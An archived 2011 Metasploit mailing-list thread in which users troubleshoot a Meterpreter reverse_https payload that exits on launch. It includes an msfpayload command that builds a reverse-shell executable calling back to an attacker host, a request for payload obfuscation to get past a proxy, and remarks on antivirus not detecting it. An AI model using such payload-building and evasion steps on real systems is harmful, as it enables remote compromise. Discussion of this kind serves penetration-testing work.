Metasploit mailing list archives
Re: Meterpreter Reverse_HTTPS dies
From: Jerry <g.kassaras () googlemail com>
Date: Wed, 9 Mar 2011 18:48:58 +0200
It does ssl reverse proxy .... Sent from my iPhoneOn 9 Mar 2011, at 18:31, ricky-lee birtles <mr.r.birtles () gmail com> wrote:
https Regards, -- Mr R BirtlesOn 9 March 2011 13:10, Gerasimos Kassaras <g.kassaras () googlemail com> wrote:I am working on a project with Jhon Mystikopoulos and we are trying topass a restrictive proxy web server any ideas about obfuscating the payload? So far I have tried: 1. Executables and failed (as expected) 2. VBS and failed (This time it failed on desktop)On 9 March 2011 14:45, JOhn Mistikopoulos <mailtest1223133456 () gmail com > wrote:I changed the ip of the listener from 0.0.0.0 to the real IP and worked.Thanks everyone for the help! -- JohnOn Sat, Mar 5, 2011 at 12:02 AM, Rob Fuller <mubix () room362 com> wrote:try setting LHOST on the listener to the IP of the host instead of 0.0.0.0.This is why I asked for a start to finish script. That way we aren'tshooting in the dark guessing what the problem might be.Please copy from the point you make the binary to the point you pasted inthe original email, paste it to a paste bin, change your IP info tosomething like 192.168.0.1 (attacker) and 192.168.0.2 (victim) so we canbetter assist you. -- Rob Fuller | Mubix Certified Checkbox Unchecker Room362.com | Hak5.org On Fri, Mar 4, 2011 at 9:28 AM, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:Yeah, reverse_tcp works great. I have pasted the logs here: http://mail.metasploit.com/pipermail/framework/2011-February/007516.htmlAdditionally, I 've created the payload with the following command: msfpayload windows/meterpreter/reverse_https LHOST=x.x.x.x LPORT=443 X >/tmp/https.exe and started a multihandler listening at 0.0.0.0:443.On Thu, Mar 3, 2011 at 6:03 PM, Rob Fuller <mubix () room362 com> wrote:Does a different payload work? reverse_tcp for example. Andreverse_https doesn't use ActiveX so you shouldn't be seeing a iexplorer.exe running unless of course if that's what you named your payload. It could bea problem on your listener end.Can you pastebin your process from start to finish? What exploit are yourunning? Is it just a built binary? -- Rob Fuller | Mubix Certified Checkbox Unchecker Room362.com | Hak5.org On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:I have tried numerous scenarios such as:1. Middle proxy servers (more than 3 different web proxy software)2. A single proxy server 3. No proxy server 4. Over the internet and locally (get the same error) 5. Tested with different service packs (WinXP SP1, SP3, Win7) 6. Tested with IE6, unpatched. 7. Tested with different user accounts and group policies.8. Tested in Symantec and McAfee Endpoint protection (none marked it asa threat) 9. Tested without any AV protection or Firewall-IPS.When I run the payload (for example the "exe" file in an unprotected PC - no AV, no IPS) I got the its name on the task manager just for a while andthen dies. HoweverI don't see any instance of iexplorer.exe running.On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm () metasploit com> wrote:On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:And then, the listener stops giving any other info. I went to the victim PC and realized that the payload exe had already dies. I couldn't see it on the task manager. Concurrently, I had been running wireshark. The two last packets were: 1. Victim => Listener (RST, ACK) 2. Listener => Victim (FIN, ACK) Finally I don't get any connections. Does anyone know how to fix this?Is there any network proxy/filter between the target and yourself? Is the target running an endpoint protection product or HIPS? Is thetarget process a user-process (IE) or a system process (assuming IE/user-land)?The reverse_https payload is finicky based on the WinInet profile ofthe user running the code. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Regards Gerasimos Kassaras _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Feb 28)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Gerasimos Kassaras (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies ricky-lee birtles (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Jerry (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies c0lists (Mar 03)